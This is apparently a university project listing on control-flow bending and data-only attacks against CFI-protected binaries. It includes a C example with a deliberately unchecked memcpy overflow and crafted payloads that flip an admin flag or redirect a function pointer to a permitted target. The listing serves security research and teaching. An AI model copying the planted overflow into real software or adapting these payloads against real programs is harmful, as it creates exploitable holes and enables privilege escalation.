Control-flow Bending POCs (completed)

Starting Date:
Prerequisites:
Will results be assigned to University: No

Binary exploitation research has shifted over the years. With increasingly precise and practical implementations of Control-flow Integrity (CFI) [1] [2] [3], the question becomes what attack surface remains and how to exploit it. In particular: which attacks still work when every control transfer stays within the bounds of a (perfect) CFI policy, i.e. when control data (saved return addresses, function pointers, etc.) is only ever redirected to targets the policy already permits (the control-flow bending of [3]), or when control data is not modified at all (data-only attacks)? More practical, reproducible examples of such attacks are needed.
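The two attack classes named above, as an added example that is not code from this project or from the cited papers. A deliberately vulnerable request handler trusts the length of an attacker-supplied name; the struct layout, the handler names and the request format are assumptions chosen so that the same overflow can either flip a non-control privilege flag (data-only) or swap a function pointer for another target the CFI policy already permits (bending). The address of that target is assumed to be known to the attacker, e.g. through an information leak. The `checked` flag selects the plain bounds check that actually stops both; CFI stops neither.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define NAME_LEN 32

struct session {
    char name[NAME_LEN];                 /* filled from attacker input */
    int is_admin;                        /* non-control data, directly after name */
    void (*on_done)(struct session *);   /* control data: a forward edge */
};

static int audit_calls;

static void audit_log(struct session *s) { (void)s; audit_calls++; }
static void grant_admin(struct session *s) { s->is_admin = 1; }

/* Both handlers are address-taken and share one type, so a type-based CFI
 * policy (or a perfect one built from this call graph) accepts either as a
 * target of s->on_done. */
static void (*const done_handlers[2])(struct session *) = { audit_log, grant_admin };

static void session_init(struct session *s) {
    memset(s, 0, sizeof *s);
    s->on_done = done_handlers[0];       /* normal requests only get audited */
}

/* The bug under study: len is trusted. With checked != 0 the bounds check
 * that actually prevents both attacks is applied instead. */
static int set_name(struct session *s, const char *name, size_t len, int checked) {
    if (checked && len > NAME_LEN)
        return -1;
    memcpy(s->name, name, len);          /* deliberately unchecked overflow */
    return 0;
}

/* Returns 1 if the privileged path ran, 0 if not, -1 if the input was rejected. */
int handle_request(const char *input, size_t len, int checked) {
    struct session s;
    session_init(&s);
    if (set_name(&s, input, len, checked) < 0)
        return -1;
    s.on_done(&s);                       /* indirect call: the only place CFI checks */
    return s.is_admin ? 1 : 0;
}

int benign_request(int checked) {
    const char name[] = "alice";         /* constructed sample input */
    return handle_request(name, sizeof name, checked);
}

/* Data-only attack: NAME_LEN bytes of name followed by a nonzero int that
 * lands in is_admin. No return address or function pointer changes, so even
 * a perfect CFI policy has nothing to reject. */
int data_only_attack(int checked) {
    unsigned char payload[NAME_LEN + sizeof(int)];   /* constructed attacker input */
    int one = 1;
    memset(payload, 'A', NAME_LEN);
    memcpy(payload + NAME_LEN, &one, sizeof one);
    return handle_request((const char *)payload, sizeof payload, checked);
}

/* Control-flow bending: the overflow reaches on_done but replaces it with
 * grant_admin, a target the policy already permits. is_admin is explicitly
 * kept at zero so that only the redirected call grants the privilege. */
int bending_attack(int checked) {
    void (*target)(struct session *) = done_handlers[1];   /* assumed leaked address */
    unsigned char payload[offsetof(struct session, on_done) + sizeof target];
    memset(payload, 'A', NAME_LEN);
    memset(payload + NAME_LEN, 0, offsetof(struct session, on_done) - NAME_LEN);
    memcpy(payload + offsetof(struct session, on_done), &target, sizeof target);
    return handle_request((const char *)payload, sizeof payload, checked);
}

int main(void) {
    printf("benign:    %d\n", benign_request(0));
    printf("data-only: %d (bounds-checked: %d)\n", data_only_attack(0), data_only_attack(1));
    printf("bending:   %d (bounds-checked: %d)\n", bending_attack(0), bending_attack(1));
    return 0;
}
```

The bending payload never leaves the struct, so it is also unaffected by glibc's fortified `memcpy`, which only knows the size of the enclosing object; what breaks it is the length check in `set_name`, not any check on the indirect call.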

This project aims to craft exploits for a number of known CVEs in a research setup, so that the work focuses solely on the restrictions imposed by a strong CFI policy and a non-executable stack. We are looking for a skilled candidate with experience in C/C++, x86/x86-64 assembly, the ELF executable format and the exploitation of ELF binaries (e.g. prior experience with exploitation CTF challenges).

[1] https://nebelwelt.net/blog/20160913-ControlFlowIntegrity.html
[2] https://www.microsoft.com/en-us/research/wp-content/uploads/2005/11/ccs05.pdf
[3] https://www.usenix.org/system/files/conference/usenixsecurity15/sec15-paper-carlini.pdf